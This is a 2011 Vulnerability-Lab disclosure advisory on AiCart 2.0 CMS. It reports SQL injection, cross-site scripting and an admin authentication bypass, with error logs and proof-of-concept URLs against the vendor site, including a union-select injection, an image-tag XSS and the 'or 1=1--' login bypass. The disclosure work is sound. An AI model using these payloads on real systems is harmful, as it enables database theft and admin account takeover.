Lucene search
Vulnerability Research LaboratoryVULNERLAB:203HistoryJun 21, 2011 - 12:00 a.m.
AiCart 2.0 CMS - Multiple Critical Web Vulnerabilities
2011-06-2100:00:00
Vulnerability Research Laboratory
www.vulnerability-lab.com
33
Document Title:
===============
AiCart 2.0 CMS - Multiple Critical Web Vulnerabilities
Release Date:
=============
2011-06-21
Vulnerability Laboratory ID (VL-ID):
====================================
203
Product & Service Introduction:
===============================
AiCart shopping cart software is created in PHP and uses a simple template structure, makes it very flexible and
easy to modify. The data in AiCart is stored in a MySQL database.AiCart is fully W3C-compliant with a CSS-based layout.
AiCart features a built-in Content Management System giving you the abity to easily manage and create unlimited web site
pages with an easy to use online text editor. Best of all AiCart is search engine friendly. A merchant can specify meta
tags for all pages and product and category pages are all stored using the relevent meta data which result in higher
search engine rankings. AiWood Digital also offers custom programming services. Every client can get a storefront with
a unique look fully customized to completely fit the style, image and structure of your business. AiCart is full
compatable with PayPal and also features its own store merchant (credit card processing requires an SSL certificate for
maximum security) as well as having the option to processoffline payments.
(Copy of the Vendor Homepage: http://www.aicart.ca/home)
Abstract Advisory Information:
==============================
Vulnerability-Lab Team discovered multiple SQL Injection & Cross Site Scripting Vulnerabilities on AiCart CMS v2.0.
Vulnerability Disclosure Timeline:
==================================
2011-06-20: Public or Non-Public Disclosure
Discovery Status:
=================
Published
Affected Product(s):
====================
Exploitation Technique:
=======================
Remote
Severity Level:
===============
Critical
Technical Details & Description:
================================
1.1
Multiple SQL Injection Vulnerabilities are detected on the new AiCart Shopping CMS v2.0.
The vulnerability allows remote attacker (pre-auth) to inject own sql statements on the application dbms.
Vulnerable Module(s):
[+] Add to Cart (Shop)
[+] Sortby
[+] TYPE_ID
[+] ID
--- SQL Error Logs ---
SQL Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version
for the right syntax to use near Limit 24, 24 at line 4
SQL Data: SELECT * from products WHERE bid = 2 AND status = 1 ORDER BY -1 Limit 24, 24
File: /home/aicart/public_html/v3/includes/class.sql_db.php
Line: 50
SQL Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version
for the right syntax to use near order by 1--, NOW()) at line 1
SQL Data: INSERT into basket (cartid, uid, pid, quantity, date) values (5669fc809f48dff557fb50bee3ab472d-1308462112,
2, 2, order by 1--, NOW())
File: /home/aicart/public_html/v3/includes/class.sql_db.php
Line: 43
SQL Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for
the right syntax to use near at line 1
SQL Data: SELECT * from product_brands WHERE lname = -1;
File: /home/aicart/public_html/v3/includes/class.sql_db.php
Line: 50
SQL Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the
right syntax to use near , NOW()) at line 1
SQL Data: INSERT into basket (cartid, pid, quantity, date) values (38314720c60f05f218b581bad46caed0-1308461139, 2, -1, NOW())
File: /home/aicart/public_html/v3/includes/class.sql_db.php
Line: 43
1.2
A persistent Input Validation Vulnerability is detected on the ajax module on the pager param request.
The vulnerability allows an remote attacker to implemente malicious persistent script code on application-side.
The successfully exploitation of the bug allows an attacker to hijack the admin/customer sessions(accounts) or
can lead to contest request manipulation.
Vulnerable Module(s):
[+] Ajax - Pager
[+] Credit Name
[+] Rating
[+] Search
1.3
An Auth Bypass Vulnerability is detected on the admin login form of the AiCart Admin Interface.
The bug allows an atttacker to bypass the auth to the admin panel.
Pictures:
../1.png
../1.jpg
../2.jpg
../3.jpg
../4.jpg
../5.jpg
../6.jpg
Proof of Concept (PoC):
=======================
The vulnerabilities can be exploited by remote attackers. For demonstration or reproduce ...
1.1
SQL Reference:
http://www.aicart.ca/templates/ajax/pager.php?type=brands&page=1&sortby=-1%27&where_id=&type_id=Nikon
http://www.aicart.ca/templates/ajax/pager.php?type=brands&page=0&sortby=&where_id=&type_id=-1%27
http://www.aicart.ca/store?action=orders&id=-3+union+select+version(),2,3,4,5,6,7,8,9,10,11,12,13,14,15--
1.2
XSS Reference:
http://www.aicart.ca/templates/ajax/pager.php?type=reviews&page=0&sortby=&where_id=pid%20=%202&pager_id=
http://www.aicart.ca/search?searchstring=%22%3E%3Cimg%20src=%22http://gallery.7bna.com/data/media/50/injection.jpg%22%3E&x=0&y=0
1.3
Auth Bypass:
http://www.aicart.ca/v3/admin/SQL%20Error:%20You%20have%20an%20error%20in%20your%20SQL%20syntax;%20check%20the%20manual%20that%20corresponds%20to%20your%20MySQL%20server%20version%20for%20the%20right%20syntax%20to%20use%20near%20'8ce3f2de6a1e527b7e2b0c81807743e9''%20at%20line%201%3Cbr%20/%3ESQL%20Data:%20SELECT%20*%20from%20users_admin%20where%20email%20=%20''%20or%201=1--'%20AND%20password%20=%20'8ce3f2de6a1e527b7e2b0c81807743e9'%3Cbr%20/%3EFile:%20/home/aicart/public_html/v3/includes/class.sql_db.php%3Cbr%20/%3ELine:%20500/admin
String: 'or 1=1--
Security Risk:
==============
1.1
The security risk of the multiple sql injection vulnerabilities are estimated as critical.
1.2
The security risk of the multiple cross site scripting vulnerabilities are estimated as medium.
1.3
The security risk of the auth bypass vulnerability is estimated as critical.
Credits & Authors:
==================
Vulnerability Research Laboratory
Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability-Lab disclaims all warranties,
either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-
Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business
profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some
states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation
may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases
or trade with fraud/stolen material.
Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.vulnerability-lab.com/register
Contact: [email protected] - [email protected] - [email protected]
Section: video.vulnerability-lab.com - forum.vulnerability-lab.com - news.vulnerability-lab.com
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php
Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory.
Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other
media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, sourcecode, videos and
other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed),
modify, use or edit our material contact ([email protected] or [email protected]) to get a permission.
Copyright © 2012 | Vulnerability Laboratory